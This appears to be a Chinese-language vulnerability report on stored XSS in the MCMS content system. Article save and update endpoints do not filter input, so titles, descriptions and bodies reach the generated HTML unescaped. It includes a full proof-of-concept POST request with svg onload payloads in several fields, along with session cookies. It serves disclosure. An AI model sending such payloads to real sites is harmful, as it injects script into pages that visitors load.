代码拉取完成,页面将自动刷新
在保存或者更新文章的时候,没有对提交数据做严格的过滤。生成文章时,在前台照成xss攻击。
net.mingsoft.cms.action#save()
net.mingsoft.cms.action#update()
net.mingsoft.cms.entity
在net.mingsoft.cms.entity包下面都是类似JavaBean的写法,set()直接设置,get()获取返回直接返回,没有过滤。
构造payload
可以看到这几个字段都没经过有限过滤。
生成poc
net.mingsoft.cms.action
生成时,会把上面payload直接输出到前台html。
可以看到其中 标题、描述、内容,直接输出到前台HTML。
可以看到contentTitle、contentDescription、contentDetails 三个构造的payload触发。
POST /ms/cms/content/save.do HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
Pragma: no-cache
token: null
Content-Length: 491
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/ms/cms/content/form.do
Cookie: Phpstorm-f6f062b4=5f525093-5f84-4757-8d57-73a0807e485f; currentMenuCode=1599107821860655104; pageNo=2; pageSize=20; pageno_cookie=1; SHIRO_SESSION_ID=58a8d37d-8a16-430e-a7ef-925839f673e0; rememberMe=5cjEDUiKQ6EcshxFJv6JNis4+TagGWtfYnhBYTSNM7EP5KDqO2/eXptuk3yigpRYnLtx+I12zn8n+Gst9nIatcPOzKhtmhXsRFeVEZkhMnKk6/hwmvK6bikR3zS59ckqOCyxze4jmESJ8Kh8h50p1w9CchOCxhcH17GpRz29vlPFvdT1iKZHMHncxuhfDCfBj5mQOpwSHtGotKOJoQ+EJdnmcRvkdDRkP/woZ+xvAZTixkRHW1HWn3/nIjapKo5G5EmXeuN+1YmauoeMX9NXg1n4Q3XONqwS3EJC1PMqdLWIOxBjt9vEGC9OnsiUHlZDZnFwxFs9A0gELQUO0qy0/cudGdDamjgFTa4bLCQvJ0GjHCaigPj+PvQ2qPc+dfXuUzC9sYK9E1tv8QtsrEQXjuNoHsc7a0OMvTPSfKYntICLzNfhI8oDF6dZLuW/4pRUYTD9N650hVA/Aa9oDrLMCj10m52kTPrQ0u3yU6VsOSr4vY1D/Zkj7VsHfnN8teAwC0V0CzyDC+PJfIuccESmNSkI/7mtVNV9P45dY8eJZTP+GgAEOLcZB73BYRujlD50iqaeMxUJXQPOZkpE8rCrxZpKS+1sjgti9gbRYdbdiF4b78GNyzOZShCGMIdt06uuDcL4pGIq6iBSVk2v0hf65nbIFhl7Wfn3hZeg6/ETfTqUCYq8vW0TLK6WO7njF/083lb4Pz39Bx2Dejdx5IfQt5oLyxSoqLrDaB87Fuq+96yZz3Iw+VITpahW2UBinDGF25R85PbqKY8SacCQzqQaqHz4zKkPLtIvMEVYld7bMVL+vLU5FB7Da5Ti9ce+XAkUK6nEsWYpJq3ONi5+nzI1ZSIWfEuumIK6xGQ6qpyjPSo732xSfHT+1fpAhs+yTGlFpTk+iht43qK5upi2jcAZcxqy3mFjjbLXVAng7Bp0QbRH+aD+su8H/UEGiOEJ9b6in2zCN/caz6YNmNpjb1ubG3VBOYanpERZEaRuL/5Sl294YE6mBUPfn+CN0xjzJWCiC0KqBI1DCxb6D0u2mLdsXaCbhCv02VyVL3IlHScbE50MXz/ioisb0ccLTNzafP41YjO5bDz1laIsvTw1keROjcltAexzgQxnC42tozLKzedLygLClhuxqvzHMGTnQg5J5nvmYWT96gc7uuEJnyQl4/62RY0bnQ/nj7b81nHxxZQeAUSico2GKeQjJGSTPNWMh++h8sdImqVvbE2ARhkgXsyOIQrmGTN8Tk+g2yVPG947S37PGdUCb2lfzRBV1UQipiNJ1HuSTbfSzNRY5Nfrer0xaI78+Mc5j7xoSswg1r5jsO/zFdL/66U+DO5Q8jsQTn8zjapBYK+nEa0=
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
contentTitle=<svg/onload=console.log('xss1')>&categoryId=1329257757913718785&contentType=<svg/onload=console.log('xss2')>&contentDisplay=0&contentAuthor=<svg/onload=console.log('xss3')>&contentSource=<svg/onload=console.log('xss4')>&contentSort=0&contentImg="><svg/onload%3dconsole.log('xss5')>"<&contentDescription=<svg/onload=console.log('xss6')>&contentKeyword=<svg/onload=console.log('xss7')>&contentDetails=<svg/onload=console.log('xss8')>&contentDatetime=2022-12-08%2005%3A19%3A37&id=0
FileDragTip
